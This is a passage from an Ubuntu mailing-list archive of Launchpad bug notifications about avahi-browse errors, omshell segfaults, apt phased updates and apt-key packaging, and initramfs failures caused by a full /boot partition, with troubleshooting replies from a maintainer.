mdns) the problem does not occur Since the debugging output of avahi software is – if at all – very poor, I cannot see what causes this problem. However, dbus-monitor --system showed ... method call time=1673742811.321042 sender=:1.692 -> destination=org.freedesktop.Avahi serial=10 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew int32 -1 int32 -1 string "_ipp._tcp" string "local" uint32 0 method return time=1673742811.321093 sender=:1.479 -> destination=:1.692 serial=557 reply_serial=10 object path "/Client29/ServiceBrowser3" method call time=1673742811.321259 sender=:1.692 -> destination=org.freedesktop.Avahi serial=11 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew int32 -1 int32 -1 string "_scanner._tcp" string "local" uint32 0 method return time=1673742811.321301 sender=:1.479 -> destination=:1.692 serial=558 reply_serial=11 object path "/Client29/ServiceBrowser4" method call time=1673742811.321391 sender=:1.692 -> destination=org.freedesktop.Avahi serial=12 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew int32 -1 int32 -1 string "" string "" uint32 0 error time=1673742811.321479 sender=:1.479 -> destination=:1.692 error_name=org.freedesktop.Avahi.InvalidServiceTypeError reply_serial=12 string "Invalid service type" So it seems as if the client (browser) queries one services after the other, which works, but then an empty string as a name, which is rejected by the daemon, which then makes the client to spit out this error message and then terminate immediately. Since I have similar (i.e. very similar, both created with puppet) machines, and all machines in one network fail, while similar machines in another don't, I guess that the problem is caused by some network reply, maybe a printer. This, however, could be a security problem, because if someone can cause avahi and thus mdns resolution to fail in networks like this here, where the router and dhcp server does not offer the host names in a DNS domain (Huawei glass fiber router), a malformed packet could cause the mdns resolution of avahi to fail and therefore could be used for an attack, effectively blocking certain kinds of mdns service resolution. But since I have not yet understood what really causes this problem, it is just an assumption. regards ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: avahi-utils 0.8-5ubuntu5 ProcVersionSignature: Ubuntu 5.15.0-58.64-generic 5.15.74 Uname: Linux 5.15.0-58-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu82.3 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: XFCE Date: Sun Jan 15 02:35:24 2023 InstallationDate: Installed on 2022-12-25 (20 days ago) InstallationMedia: Xubuntu 22.04.1 LTS "Jammy Jellyfish" - Release amd64 (20220809.1) SourcePackage: avahi UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/avahi/+bug/2002891/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1916931] Re: omshell returns inconsistent results or segfaults
** Changed in: isc-dhcp (Ubuntu) Status: Expired => New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu. https://bugs.launchpad.net/bugs/1916931 Title: omshell returns inconsistent results or segfaults Status in isc-dhcp package in Ubuntu: New Bug description: I have just built a Ubuntu 20.04 server and installed isc-dhcp-server 4.4.1 on it and I am seeing inconsistent returns from omshell. Initially omshell returns data as expected, but when I exit and re-enter omshell connections fail. Here is the initial, working, session: # omshell > server localhost > port 7911 > key omapi_key > connect obj: > new failover-state obj: failover-state > set name = "dhcp-failover" obj: failover-state name = "dhcp-failover" > open obj: failover-state name = "dhcp-failover" partner-address = c0:9d:e9:76:e9:55:00:00 partner-port = 00:00:02:07 local-address = 10:9d:e9:76:e9:55:00:00 local-port = 00:00:02:07 max-outstanding-updates = 00:00:00:0a mclt = 00:00:01:2c load-balance-max-secs = 00:00:00:03 load-balance-hba = ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 partner-state = 00:00:00:02 local-state = 00:00:00:02 partner-stos = 60:36:d0:68 local-stos = 60:36:8b:3b hierarchy = 00:00:00:01 last-packet-sent = 00:00:00:00 last-timestamp-received = 00:00:00:00 skew = 00:00:00:00 max-response-delay = 00:00:00:3c cur-unacked-updates = 00:00:00:00 Here is what I see when the connect fails. Well, just hangs really. # omshell > server localhost > port 7911 > key omapi_key > connect And then I hit ctrl-c to break out and tried again: # omshell > server localhost > port 7911 > key omapi_key > connect Segmentation fault (core dumped) Note, the peer to this server is still running Ubuntu 18.04 with isc-dhcp-server 4.3.5. Running the exact same commands on the peer works reliably. (They are using the same python script to drive omshell.) The DHCP server on the new system appears to be working just fine as reported by omshell on the peer and systemctl. I was curious if the problem could be with the mis-matched versions of isc-dhcp-server so I shutdown isc-dhcp-server on the 18.04 system and get the same results. I also tried using a python script with the pypureomapi module to try and determine if the problem was in omshell or the server. I got very similar results when I attempted to get information about the failover state of the server. Interestingly interrogating the server about host information seems to work just fine. This is a critical bug since I don't see how to fail over a DHCP that is running the isc-dhcp-server on 20.04 without being able to issue omapi commands. I am attaching apport output to this bug report. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1916931/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1988819] Re: When apt keeps back packages due to phased updates, it should say nothing
So far I've been arguing that apt should be more verbose about phasing, and why these packages are held back. A friend has suggested that instead apt should say *nothing*. I can see the appeal. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/1988819 Title: When apt keeps back packages due to phased updates, it should say nothing Status in apt package in Ubuntu: Triaged Bug description: After phased updates have been introduced, it may happen that apt upgrade shows packages as upgradable but ends up not upgrading them. In this case the packages are indicated as being "kept back". Unfortunately, the feedback provided about this to the user is not very informative. The user sees the packages being kept back and thinks something is going wrong on the system. When packages are kept back because of phased updates, apt should say so e.g., it should say that the upgrade is delayed. Incidentally note that aptitude does not respect phased updates. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: apt 2.4.7 ProcVersionSignature: Ubuntu 5.15.0-47.51-generic 5.15.46 Uname: Linux 5.15.0-47-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Tue Sep 6 10:05:14 2022 EcryptfsInUse: Yes InstallationDate: Installed on 2020-02-16 (933 days ago) InstallationMedia: Kubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) SourcePackage: apt UpgradeStatus: Upgraded to jammy on 2022-06-03 (94 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1988819/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2003759] [NEW] apt phasing should be documented in apt.conf(5) rather than apt_preferences(5)
Public bug reported: Hello, the apt documentation on controlling apt phasing is in apt_preferences(5). However, putting the records into a file in /etc/apt/preferences.d leads to an error: $ rg -l APT::Machine-ID -g '*.xml' apt_2.2.2ubuntu1/doc/apt_preferences.5.xml apt_2.3.10/doc/apt_preferences.5.xml apt_2.3.7/doc/apt_preferences.5.xml apt_2.1.17/doc/apt_preferences.5.xml apt_2.3.3/doc/apt_preferences.5.xml apt_2.3.9/doc/apt_preferences.5.xml apt_2.4.8/doc/apt_preferences.5.xml apt_2.2.3/doc/apt_preferences.5.xml apt_2.5.0/doc/apt_preferences.5.xml apt_2.4.5/doc/apt_preferences.5.xml apt_2.3.13/doc/apt_preferences.5.xml apt_2.2.1/doc/apt_preferences.5.xml apt_2.3.11/doc/apt_preferences.5.xml apt_2.3.6/doc/apt_preferences.5.xml apt_2.1.16/doc/apt_preferences.5.xml apt_2.3.9ubuntu0.1/doc/apt_preferences.5.xml apt_2.5.3/doc/apt_preferences.5.xml apt_2.4.0/doc/apt_preferences.5.xml apt_2.3.5/doc/apt_preferences.5.xml apt_2.2.2/doc/apt_preferences.5.xml apt_2.3.15build1/doc/apt_preferences.5.xml apt_2.3.15/doc/apt_preferences.5.xml apt_2.3.8/doc/apt_preferences.5.xml apt_2.2.4ubuntu0.1/doc/apt_preferences.5.xml apt_2.4.3/doc/apt_preferences.5.xml apt_2.1.18/doc/apt_preferences.5.xml ⏚ [sarnold:/etc/apt] $ sudo vim /etc/apt/preferences.d/phased-updates [sudo] password for sarnold: ⏚ [sarnold:/etc/apt] 11s $ apt list E: Invalid record in the preferences file /etc/apt/preferences.d/phased-updates, no Package header ⏚ [sarnold:/etc/apt] $ cat /etc/apt/preferences.d/phased-updates // To have all your machines phase the same, set the same string in this field // If commented out, apt will use /etc/machine-id to seed the random number generator APT::Machine-ID ""; // Always include phased updates APT::Get::Always-Include-Phased-Updates "1"; // Never include phased updates # APT::Get::Never-Include-Phased-Updates "1"; Considering how difficult it is to tell which of preferences vs conf should be used for which settings, mentioning phasing in both manpages would be very kind. However, both manpages should be clear about which one is actually correct. Thanks ** Affects: apt (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/2003759 Title: apt phasing should be documented in apt.conf(5) rather than apt_preferences(5) Status in apt package in Ubuntu: New Bug description: Hello, the apt documentation on controlling apt phasing is in apt_preferences(5). However, putting the records into a file in /etc/apt/preferences.d leads to an error: $ rg -l APT::Machine-ID -g '*.xml' apt_2.2.2ubuntu1/doc/apt_preferences.5.xml apt_2.3.10/doc/apt_preferences.5.xml apt_2.3.7/doc/apt_preferences.5.xml apt_2.1.17/doc/apt_preferences.5.xml apt_2.3.3/doc/apt_preferences.5.xml apt_2.3.9/doc/apt_preferences.5.xml apt_2.4.8/doc/apt_preferences.5.xml apt_2.2.3/doc/apt_preferences.5.xml apt_2.5.0/doc/apt_preferences.5.xml apt_2.4.5/doc/apt_preferences.5.xml apt_2.3.13/doc/apt_preferences.5.xml apt_2.2.1/doc/apt_preferences.5.xml apt_2.3.11/doc/apt_preferences.5.xml apt_2.3.6/doc/apt_preferences.5.xml apt_2.1.16/doc/apt_preferences.5.xml apt_2.3.9ubuntu0.1/doc/apt_preferences.5.xml apt_2.5.3/doc/apt_preferences.5.xml apt_2.4.0/doc/apt_preferences.5.xml apt_2.3.5/doc/apt_preferences.5.xml apt_2.2.2/doc/apt_preferences.5.xml apt_2.3.15build1/doc/apt_preferences.5.xml apt_2.3.15/doc/apt_preferences.5.xml apt_2.3.8/doc/apt_preferences.5.xml apt_2.2.4ubuntu0.1/doc/apt_preferences.5.xml apt_2.4.3/doc/apt_preferences.5.xml apt_2.1.18/doc/apt_preferences.5.xml ⏚ [sarnold:/etc/apt] $ sudo vim /etc/apt/preferences.d/phased-updates [sudo] password for sarnold: ⏚ [sarnold:/etc/apt] 11s $ apt list E: Invalid record in the preferences file /etc/apt/preferences.d/phased-updates, no Package header ⏚ [sarnold:/etc/apt] $ cat /etc/apt/preferences.d/phased-updates // To have all your machines phase the same, set the same string in this field // If commented out, apt will use /etc/machine-id to seed the random number generator APT::Machine-ID ""; // Always include phased updates APT::Get::Always-Include-Phased-Updates "1"; // Never include phased updates # APT::Get::Never-Include-Phased-Updates "1"; Considering how difficult it is to tell which of preferences vs conf should be used for which settings, mentioning phasing in both manpages would be very kind. However, both manpages should be clear about which one is actually correct. Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2003759/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More h
[Touch-packages] [Bug 2004505] [NEW] apt-key is still packaged
Public bug reported: The apt-key(8) manpage includes: apt-key(8) will last be available in Debian 11 and Ubuntu 22.04. It appears that apt-key was shipped in Ubuntu 22.10 by accident. apt-key is still in the 2.5.5 apt packaged for Lunar: https://launchpad.net/ubuntu/lunar/amd64/apt/2.5.5 ⏚ [sarnold:/tmp] $ wget http://launchpadlibrarian.net/646589288/apt_2.5.5_amd64.deb --2023-02-01 18:58:39-- http://launchpadlibrarian.net/646589288/apt_2.5.5_amd64.deb Resolving launchpadlibrarian.net (launchpadlibrarian.net)... 2620:2d:4000:1001::8007, 2620:2d:4000:1001::8008, 185.125.189.229, ... Connecting to launchpadlibrarian.net (launchpadlibrarian.net)|2620:2d:4000:1001::8007|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1377746 (1.3M) [application/x-debian-package] Saving to: ‘apt_2.5.5_amd64.deb’ apt_2.5.5_amd64.deb 100%[>] 1.31M 1.26MB/sin 1.0s 2023-02-01 18:58:41 (1.26 MB/s) - ‘apt_2.5.5_amd64.deb’ saved [1377746/1377746] ⏚ [sarnold:/tmp] 2s $ ar x apt_2.5.5_amd64.deb ⏚ [sarnold:/tmp] $ tar tf data.tar.zst | grep bin ./usr/bin/ ./usr/bin/apt ./usr/bin/apt-cache ./usr/bin/apt-cdrom ./usr/bin/apt-config ./usr/bin/apt-get ./usr/bin/apt-key ./usr/bin/apt-mark ⏚ [sarnold:/tmp] $ Thanks ** Affects: apt (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/2004505 Title: apt-key is still packaged Status in apt package in Ubuntu: New Bug description: The apt-key(8) manpage includes: apt-key(8) will last be available in Debian 11 and Ubuntu 22.04. It appears that apt-key was shipped in Ubuntu 22.10 by accident. apt-key is still in the 2.5.5 apt packaged for Lunar: https://launchpad.net/ubuntu/lunar/amd64/apt/2.5.5 ⏚ [sarnold:/tmp] $ wget http://launchpadlibrarian.net/646589288/apt_2.5.5_amd64.deb --2023-02-01 18:58:39-- http://launchpadlibrarian.net/646589288/apt_2.5.5_amd64.deb Resolving launchpadlibrarian.net (launchpadlibrarian.net)... 2620:2d:4000:1001::8007, 2620:2d:4000:1001::8008, 185.125.189.229, ... Connecting to launchpadlibrarian.net (launchpadlibrarian.net)|2620:2d:4000:1001::8007|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1377746 (1.3M) [application/x-debian-package] Saving to: ‘apt_2.5.5_amd64.deb’ apt_2.5.5_amd64.deb 100%[>] 1.31M 1.26MB/sin 1.0s 2023-02-01 18:58:41 (1.26 MB/s) - ‘apt_2.5.5_amd64.deb’ saved [1377746/1377746] ⏚ [sarnold:/tmp] 2s $ ar x apt_2.5.5_amd64.deb ⏚ [sarnold:/tmp] $ tar tf data.tar.zst | grep bin ./usr/bin/ ./usr/bin/apt ./usr/bin/apt-cache ./usr/bin/apt-cdrom ./usr/bin/apt-config ./usr/bin/apt-get ./usr/bin/apt-key ./usr/bin/apt-mark ⏚ [sarnold:/tmp] $ Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2004505/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2006793] Re: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu. https://bugs.launchpad.net/bugs/2006793 Title: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 Status in initramfs-tools package in Ubuntu: New Bug description: Its says a system error occurred - I've been getting these for a year now - and I have no idea where it's coming from. ProblemType: Package DistroRelease: Ubuntu 20.04 Package: linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 ProcVersionSignature: Ubuntu 5.15.0-58.64~20.04.1-generic 5.15.74 Uname: Linux 5.15.0-58-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 CasperMD5CheckResult: skip Date: Thu Feb 9 17:11:23 2023 ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 InstallationDate: Installed on 2021-04-05 (675 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: N/A RelatedPackageVersions: dpkg 1.19.7ubuntu3.2 apt 2.0.9 SourcePackage: initramfs-tools Title: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/2006793/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2006793] Re: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
Hello, my guess is your /boot filesystem is out of space. You might be able to free up enough space by running: sudo apt autoremove If that doesn't make enough free space, you might want to ask for help on https://askubuntu.com or #ubuntu on https://libera.chat Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu. https://bugs.launchpad.net/bugs/2006793 Title: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 Status in initramfs-tools package in Ubuntu: New Bug description: Its says a system error occurred - I've been getting these for a year now - and I have no idea where it's coming from. ProblemType: Package DistroRelease: Ubuntu 20.04 Package: linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 ProcVersionSignature: Ubuntu 5.15.0-58.64~20.04.1-generic 5.15.74 Uname: Linux 5.15.0-58-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 CasperMD5CheckResult: skip Date: Thu Feb 9 17:11:23 2023 ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 InstallationDate: Installed on 2021-04-05 (675 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: N/A RelatedPackageVersions: dpkg 1.19.7ubuntu3.2 apt 2.0.9 SourcePackage: initramfs-tools Title: package linux-image-5.15.0-60-generic 5.15.0-60.66~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/2006793/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008141] [NEW] apt pattern to list packages from universe
Public bug reported: Hello, a friend would like to remove all universe packages from their system but I do not know an easy way to discover which installed packages came from universe. I expected one of these two apt patterns to work: ?archive(REGEX), ~AREGEX Selects versions that come from the archive that matches the specified regular expression. Archive, here, means the values after a= in apt-cache policy. ?origin(REGEX), ~OREGEX Selects versions that come from the origin that matches the specified regular expression. Origin, here, means the values after o= in apt-cache policy. However, a quick check of my own system's apt-cache policy output shows the a= and o= values aren't helpful for determining universe from main: $ apt-cache policy | grep -A1 universe 500 http://security.ubuntu.com/ubuntu focal-security/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-security,n=focal,l=Ubuntu,c=universe,b=amd64 origin security.ubuntu.com -- 400 http://192.168.0.27/ubuntu focal-proposed/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-proposed,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 -- 500 http://192.168.0.27/ubuntu focal-updates/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-updates,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 -- 500 http://192.168.0.27/ubuntu focal/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 Are there apt patterns that can select the c=universe state? Thanks ** Affects: apt (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/2008141 Title: apt pattern to list packages from universe Status in apt package in Ubuntu: New Bug description: Hello, a friend would like to remove all universe packages from their system but I do not know an easy way to discover which installed packages came from universe. I expected one of these two apt patterns to work: ?archive(REGEX), ~AREGEX Selects versions that come from the archive that matches the specified regular expression. Archive, here, means the values after a= in apt-cache policy. ?origin(REGEX), ~OREGEX Selects versions that come from the origin that matches the specified regular expression. Origin, here, means the values after o= in apt-cache policy. However, a quick check of my own system's apt-cache policy output shows the a= and o= values aren't helpful for determining universe from main: $ apt-cache policy | grep -A1 universe 500 http://security.ubuntu.com/ubuntu focal-security/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-security,n=focal,l=Ubuntu,c=universe,b=amd64 origin security.ubuntu.com -- 400 http://192.168.0.27/ubuntu focal-proposed/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-proposed,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 -- 500 http://192.168.0.27/ubuntu focal-updates/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-updates,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 -- 500 http://192.168.0.27/ubuntu focal/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 Are there apt patterns that can select the c=universe state? Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2008141/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008051] Re: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu. https://bugs.launchpad.net/bugs/2008051 Title: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1 Status in initramfs-tools package in Ubuntu: New Bug description: I don't know.. I have no idea.. you've made this too difficult for average users (non technical people) and it isn't fair. Something is failing on my system related to installing linux-firmware and that sounds bad. Now I (a regular person) have to drop everything and try to figure it out? Maybe if I don't give you what you want here in this further information section I don't get help or the thing to be fixed? ProblemType: Package DistroRelease: Ubuntu 20.04 Package: linux-firmware 1.187.36 ProcVersionSignature: Ubuntu 5.15.0-60.66~20.04.1-generic 5.15.78 Uname: Linux 5.15.0-60-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: gdm1641 F pulseaudio jake 2452 F pulseaudio CasperMD5CheckResult: skip Date: Tue Feb 21 23:29:18 2023 Dependencies: ErrorMessage: installed linux-firmware package post-installation script subprocess returned error exit status 1 InstallationDate: Installed on 2021-04-05 (687 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) MachineType: HP HP ENVY Laptop 17-cg1xxx PackageArchitecture: all ProcFB: 0 i915drmfb ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-60-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 PulseList: Error: command ['pacmd', 'list'] failed with exit code 1: No PulseAudio daemon running, or not running as session daemon. Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: N/A RelatedPackageVersions: grub-pc 2.04-1ubuntu26.16 SourcePackage: initramfs-tools Title: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1 UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 02/17/2021 dmi.bios.release: 15.12 dmi.bios.vendor: Insyde dmi.bios.version: F.12 dmi.board.asset.tag: Type2 - Board Asset Tag dmi.board.name: 8823 dmi.board.vendor: HP dmi.board.version: 49.36 dmi.chassis.asset.tag: Chassis Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: HP dmi.chassis.version: Chassis Version dmi.ec.firmware.release: 49.36 dmi.modalias: dmi:bvnInsyde:bvrF.12:bd02/17/2021:br15.12:efr49.36:svnHP:pnHPENVYLaptop17-cg1xxx:pvrType1ProductConfigId:rvnHP:rn8823:rvr49.36:cvnHP:ct10:cvrChassisVersion:sku19S92AV: dmi.product.family: 103C_5335KV HP Envy dmi.product.name: HP ENVY Laptop 17-cg1xxx dmi.product.sku: 19S92AV dmi.product.version: Type1ProductConfigId dmi.sys.vendor: HP To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/2008051/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008051] Re: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1
These look like the important errors: update-initramfs: Generating /boot/initrd.img-5.15.0-60-generic I: The initramfs will attempt to resume from /dev/dm-2 I: (/dev/mapper/vgubuntu-swap_1) I: Set the RESUME variable to override this. Error 24 : Write error : cannot write compressed block E: mkinitramfs failure cpio 141 lz4 -9 -l 24 update-initramfs: failed for /boot/initrd.img-5.15.0-60-generic with 1. These kinds of messages usually mean your /boot is full. And your Df.txt confirms this: /dev/nvme0n1p2 719936550688116784 83% /boot try: sudo apt autoremove that might help, it might not. If it doesn't help, the easiest thing to do is to *truncate* old kernels and initrds from /boot. 'sudo truncate -s0 /boot/' preferably of the old versions that you're not actively running at the moment. Be careful, this could make the system fail to boot in the future if you truncate too many things, mismatched things, etc. Once done, try: sudo apt install -f You could also ask for help on https://askubuntu.com/ or irc #ubuntu irc.libera.chat. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu. https://bugs.launchpad.net/bugs/2008051 Title: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1 Status in initramfs-tools package in Ubuntu: New Bug description: I don't know.. I have no idea.. you've made this too difficult for average users (non technical people) and it isn't fair. Something is failing on my system related to installing linux-firmware and that sounds bad. Now I (a regular person) have to drop everything and try to figure it out? Maybe if I don't give you what you want here in this further information section I don't get help or the thing to be fixed? ProblemType: Package DistroRelease: Ubuntu 20.04 Package: linux-firmware 1.187.36 ProcVersionSignature: Ubuntu 5.15.0-60.66~20.04.1-generic 5.15.78 Uname: Linux 5.15.0-60-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: gdm1641 F pulseaudio jake 2452 F pulseaudio CasperMD5CheckResult: skip Date: Tue Feb 21 23:29:18 2023 Dependencies: ErrorMessage: installed linux-firmware package post-installation script subprocess returned error exit status 1 InstallationDate: Installed on 2021-04-05 (687 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) MachineType: HP HP ENVY Laptop 17-cg1xxx PackageArchitecture: all ProcFB: 0 i915drmfb ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-60-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 PulseList: Error: command ['pacmd', 'list'] failed with exit code 1: No PulseAudio daemon running, or not running as session daemon. Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: N/A RelatedPackageVersions: grub-pc 2.04-1ubuntu26.16 SourcePackage: initramfs-tools Title: package linux-firmware 1.187.36 failed to install/upgrade: installed linux-firmware package post-installation script subprocess returned error exit status 1 UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 02/17/2021 dmi.bios.release: 15.12 dmi.bios.vendor: Insyde dmi.bios.version: F.12 dmi.board.asset.tag: Type2 - Board Asset Tag dmi.board.name: 8823 dmi.board.vendor: HP dmi.board.version: 49.36 dmi.chassis.asset.tag: Chassis Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: HP dmi.chassis.version: Chassis Version dmi.ec.firmware.release: 49.36 dmi.modalias: dmi:bvnInsyde:bvrF.12:bd02/17/2021:br15.12:efr49.36:svnHP:pnHPENVYLaptop17-cg1xxx:pvrType1ProductConfigId:rvnHP:rn8823:rvr49.36:cvnHP:ct10:cvrChassisVersion:sku19S92AV: dmi.product.family: 103C_5335KV HP Envy dmi.product.name: HP ENVY Laptop 17-cg1xxx dmi.product.sku: 19S92AV 